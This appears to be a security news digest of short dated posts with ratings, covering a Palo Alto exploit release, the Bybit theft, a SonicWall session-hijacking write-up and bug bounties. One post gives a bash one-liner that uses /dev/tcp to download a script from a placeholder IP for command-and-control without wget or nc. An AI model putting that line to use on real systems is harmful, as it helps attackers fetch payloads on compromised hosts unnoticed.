■■■■□ Google Released PoC Exploit For Palo Alto Firewall Command Injection Vulnerability.
All posts by John Doe
February 22, 2025 at 12:56PM
5️⃣ 1-liner bash for C2 without using any native program like wget, nc etc., esp. in containers. bash -c 'exec 3<>/dev/tcp/IP/80; echo -e "GET /yourfile.sh HTTP/1.1\r\nHost: IP\r\nConnection: close\r\n\r\n" >&3; cat <&3 > yourfile.sh' Source: LinkedIn | Harvey Spec
February 22, 2025 at 12:46PM
■■□□□ Introduction to the IoT/Embedded Linux: The OpenWRT Project. https://www.hackers-arise.com/post/introduction-to-the-iot-embedded-linux-the-openwrt-project
February 22, 2025 at 12:45PM
■■■□□ User Email Disclosure via ID-Based Invitation. https://hackerone.com/reports/3003716
February 22, 2025 at 12:09PM
■■■■□ Unconfirmed: North Korea’s Lazarus Group stole $1.4 billion from Bybit.
February 22, 2025 at 12:10AM
■■■□□ Microsoft expands Copilot bug bounty targets, payouts. https://www.theregister.com/2025/02/20/microsoft_copilot_bug_bounty_updated/ https://msrc.microsoft.com/blog/2025/02/exciting-updates-to-the-copilot-ai-bounty-program-enhancing-security-and-incentivizing-innovation/
February 21, 2025 at 10:31PM
■■■□□ Bybit cryptocurrency exchange experienced a loss of approximately $1,400,000,000 today, primarily in ETH. The perpetrator employed sophisticated transaction chains to obfuscate the movement of funds and hinder traceability.
February 21, 2025 at 07:45PM
■■■■□ SonicWall CVE-2024-53704: SSL VPN Session Hijacking. https://bishopfox.com/blog/sonicwall-cve-2024-53704-ssl-vpn-session-hijacking
February 21, 2025 at 07:43PM
■■■■□ 9️⃣ Apple removes cloud encryption feature from UK after the government ordered the company to build a backdoor for accessing user data — Bloomberg
February 21, 2025 at 06:18PM
■■□□□ Microsoft fixes Power Pages zero-day bug exploited in attacks. https://www.bleepingcomputer.com/news/security/microsoft-fixes-power-pages-zero-day-bug-exploited-in-attacks/
